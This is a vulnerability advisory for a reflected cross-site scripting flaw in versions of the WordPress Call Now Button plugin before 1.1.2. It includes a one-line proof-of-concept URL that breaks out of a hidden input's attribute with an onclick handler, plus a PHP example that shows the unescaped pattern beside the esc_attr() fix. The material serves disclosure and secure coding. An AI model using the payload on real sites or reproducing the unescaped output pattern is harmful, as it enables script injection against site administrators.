The plugin does not escape a request parameter before outputting it back into an attribute of a hidden input, leading to Reflected Cross-Site Scripting when premium is enabled.
With premium enabled: http://example.com/wp-admin/admin.php?page=call-now-button&bid=xxxxx" accesskey=X onclick=alert(/XSS/) test="
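The bug described above is an output-escaping defect: the parameter is written into a `value="..."` attribute verbatim, so a double quote in it terminates the attribute and whatever follows is parsed as new attributes (here an event handler). The following is an added example, not the plugin's own code; it assumes a settings page that echoes a request parameter named `bid` into a hidden input, and shows that pattern next to the fix a WordPress plugin would normally apply, `esc_attr()` at the point of output.

```php
<?php
// Added example, not code from the Call Now Button plugin. It assumes the
// premium settings page echoes the "bid" request parameter into a hidden input.

// Stand-alone fallback so this file also runs outside WordPress. Inside
// WordPress the real esc_attr() from wp-includes/formatting.php is used; its
// behaviour for this purpose matches htmlspecialchars() with ENT_QUOTES.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Vulnerable pattern (what the advisory describes): the parameter lands in the
// attribute unescaped, so a double quote closes value="" and the remainder of
// the parameter is parsed as additional attributes of the input element.
function render_hidden_bid_vulnerable($bid) {
    return '<input type="hidden" name="bid" value="' . $bid . '">';
}

// Hardened pattern: esc_attr() encodes ", ', <, > and & so the value can never
// leave the attribute it was placed in. Escaping belongs at the output site;
// an earlier sanitize step on input is not a substitute for it.
function render_hidden_bid_fixed($bid) {
    return '<input type="hidden" name="bid" value="' . esc_attr($bid) . '">';
}

// Constructed sample input: a value that carries a quote and attribute text.
$bid = isset($_GET['bid']) ? wp_unslash_if_available($_GET['bid']) : 'xxxxx" data-injected="1';

// wp_unslash() is a WordPress function; outside WordPress fall back to the raw value.
function wp_unslash_if_available($value) {
    return function_exists('wp_unslash') ? wp_unslash($value) : $value;
}

echo "Vulnerable output:\n", render_hidden_bid_vulnerable($bid), "\n\n";
echo "Fixed output:\n", render_hidden_bid_fixed($bid), "\n";
```

Run it with `php example.php` to see the two renderings side by side: in the first, the browser would see a second attribute `data-injected="1"` on the input; in the second, the quote is encoded as `&quot;` and the whole string stays inside `value`. For a real plugin the same rule applies to every place a request value is echoed into HTML: `esc_attr()` inside attributes, `esc_html()` in element content, `esc_url()` for `href`/`src`.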
CPE

| Name | Operator | Version |
|---|---|---|
| call-now-button | lt | 1.1.2 |